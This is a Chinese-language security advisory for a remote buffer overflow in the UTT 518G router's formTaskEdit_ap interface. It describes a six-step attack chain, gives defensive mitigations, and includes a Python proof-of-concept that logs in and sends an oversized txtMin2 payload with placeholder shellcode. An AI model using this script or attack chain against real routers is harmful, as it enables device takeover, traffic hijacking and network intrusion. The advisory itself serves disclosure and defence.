CVE-2025-11652：UTT进取518G路由器缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-11652

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

UTT 进取 518G 路由器

漏洞概述

CVE-2025-11652是UTT进取518G路由器固件中存在的远程缓冲区溢出漏洞，影响版本至V3v3.2.7-210919-161313。该漏洞位于路由器Web管理界面的/goform/formTaskEdit_ap接口中，具体问题出现在对参数txtMin2的处理过程中。由于程序未对用户输入的txtMin2参数进行充分的长度校验和边界检查，攻击者可以通过精心构造的恶意请求触发缓冲区溢出，从而覆盖相邻内存区域。

该漏洞的CVSS 3.1评分为8.8分，属于高危级别漏洞。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），仅需低权限认证（PR:L），无需用户交互（UI:N），且对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H）。这意味着经过认证的远程攻击者可以完全控制受影响的设备。

值得注意的是，该漏洞的PoC（概念验证代码）已经被公开披露在GitHub上，攻击者可轻易获取并利用。同时，尽管安全研究人员曾提前联系厂商进行披露，但厂商未做出任何回应，进一步增加了该漏洞被利用的风险。UTT进取518G作为一款广泛应用于中小企业及家庭网络环境的路由器产品，该漏洞的存在对网络安全构成了严重威胁。

技术细节

该漏洞的技术根源在于UTT进取518G路由器固件中/goform/formTaskEdit_ap接口对txtMin2参数的处理逻辑存在缺陷。具体而言，当用户通过Web管理界面的表单提交任务编辑请求时，路由器CGI处理程序会接收并处理txtMin2参数的值，但未对该参数的长度进行充分的边界检查。

攻击者可以通过发送包含超长txtMin2参数的HTTP POST请求来触发缓冲区溢出。当txtMin2的值超过目标缓冲区所能容纳的最大长度时，多余的数据会溢出到相邻的内存区域，覆盖函数返回地址、栈帧指针或其他关键数据结构。攻击者可以利用栈溢出技术，通过精心构造溢出数据中的shellcode或ROP（Return-Oriented Programming）链，实现远程代码执行。

由于该接口位于Web管理界面，攻击者只需要获得路由器的低权限认证凭据（如普通用户账号），即可通过网络远程发起攻击，无需物理接触设备或进行其他形式的用户交互。攻击成功后，攻击者可以在路由器上执行任意代码，获取设备完全控制权，进而实施网络监听、流量劫持、DNS劫持、内网渗透等进一步攻击行为，对整个网络环境的安全构成严重威胁。

攻击链分析

STEP 1

步骤1：信息收集与目标识别

攻击者通过网络扫描工具（如Shodan、Censys等）识别暴露在互联网上的UTT进取518G路由器设备，确定目标IP地址和开放的Web管理端口（通常为80或443）。

STEP 2

步骤2：获取认证凭据

攻击者通过默认凭据字典攻击、社会工程学或之前泄露的凭据数据库，获取路由器的低权限用户账号。由于该漏洞仅需低权限认证即可利用，攻击门槛较低。

STEP 3

步骤3：登录Web管理界面

攻击者使用获取的凭据登录路由器的Web管理界面，建立有效的会话Cookie，为后续漏洞利用做准备。

STEP 4

步骤4：构造缓冲区溢出payload

攻击者根据目标设备固件版本和处理器架构（通常为MIPS），构造包含恶意shellcode或ROP链的超长txtMin2参数值，用于覆盖栈缓冲区并劫持程序执行流程。

STEP 5

步骤5：发送恶意请求触发漏洞

攻击者通过认证会话向/goform/formTaskEdit_ap接口发送包含恶意txtMin2参数的POST请求，触发缓冲区溢出漏洞，实现远程代码执行。

STEP 6

步骤6：获取设备控制权

漏洞利用成功后，攻击者在路由器上获得任意代码执行权限，可以植入后门、修改路由配置、劫持DNS或进行内网渗透等后续恶意活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-11652 - UTT 518G Buffer Overflow PoC
# Target: /goform/formTaskEdit_ap parameter txtMin2
# Author: Security Researcher

import requests
import sys

TARGET_URL = "http://TARGET_HOST"
LOGIN_URL = f"{TARGET_URL}/goform/login"
EXPLOIT_URL = f"{TARGET_URL}/goform/formTaskEdit_ap"

# Credentials (low privilege account required)
USERNAME = "user"
PASSWORD = "password"

def login(session, base_url):
    """Authenticate to the router web interface"""
    login_data = {
        "username": USERNAME,
        "password": PASSWORD,
        "submit": "Login"
    }
    resp = session.post(f"{base_url}/goform/login", data=login_data)
    return resp.status_code == 200

def exploit(session, base_url, payload):
    """Send buffer overflow payload via txtMin2 parameter"""
    data = {
        "txtMin2": payload,
        # Additional form parameters as needed
    }
    try:
        resp = session.post(f"{base_url}/goform/formTaskEdit_ap", data=data, timeout=10)
        return resp
    except requests.exceptions.RequestException as e:
        print(f"[+] Target may have crashed (expected): {e}")
        return None

def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)

    target = sys.argv[1]
    base_url = f"http://{target}"

    # Construct overflow payload (adjust offset as needed)
    # Typical buffer size ~256 bytes; adjust based on firmware analysis
    offset = 256
    # NOP sled + shellcode placeholder
    nop_sled = b"\x90" * 16
    # Replace with actual shellcode for target architecture (MIPS/ARM)
    shellcode = b"\xcc" * 64
    # Return address (little-endian, adjust based on stack analysis)
    ret_addr = b"\x41\x41\x41\x41"

    payload = b"A" * offset + ret_addr + nop_sled + shellcode

    session = requests.Session()

    print(f"[*] Authenticating to {target}...")
    if not login(session, base_url):
        print("[-] Login failed. Check credentials.")
        sys.exit(1)
    print("[+] Authentication successful")

    print(f"[*] Sending buffer overflow payload to txtMin2...")
    result = exploit(session, base_url, payload)

    if result is None:
        print("[+] Exploit completed - target likely compromised")
    else:
        print(f"[*] Response status: {result.status_code}")
        print("[+] Exploit sent successfully")

if __name__ == "__main__":
    main()

影响范围

UTT 进取 518G <= V3v3.2.7-210919-161313

防御指南

临时缓解措施

在等待厂商发布安全补丁期间，建议采取以下临时缓解措施：1）立即修改路由器的默认登录密码为强密码，并限制管理账号的访问权限；2）禁用路由器的远程Web管理功能（WAN端管理），仅允许通过内网进行管理操作；3）通过防火墙规则限制对路由器Web管理端口（80/443）的外部访问，仅允许可信IP地址访问；4）定期检查并更新路由器固件，关注厂商的安全公告；5）部署网络监控工具，监控针对/goform/formTaskEdit_ap接口的异常请求；6）考虑使用替代路由器设备，特别是对于关键网络环境。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11652
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11652
3 Details https://www.cvedetails.com/cve/CVE-2025-11652/
4 VulDB https://vuldb.com/cve/CVE-2025-11652
5 Link https://github.com/cymiao1978/cve/blob/main/14.md
6 Link https://github.com/cymiao1978/cve/blob/main/14.md#poc
7 Link https://vuldb.com/?ctiid.328069
8 Link https://vuldb.com/?id.328069
9 Link https://vuldb.com/?submit.664926
10 Link https://github.com/cymiao1978/cve/blob/main/14.md
11 Link https://github.com/cymiao1978/cve/blob/main/14.md#poc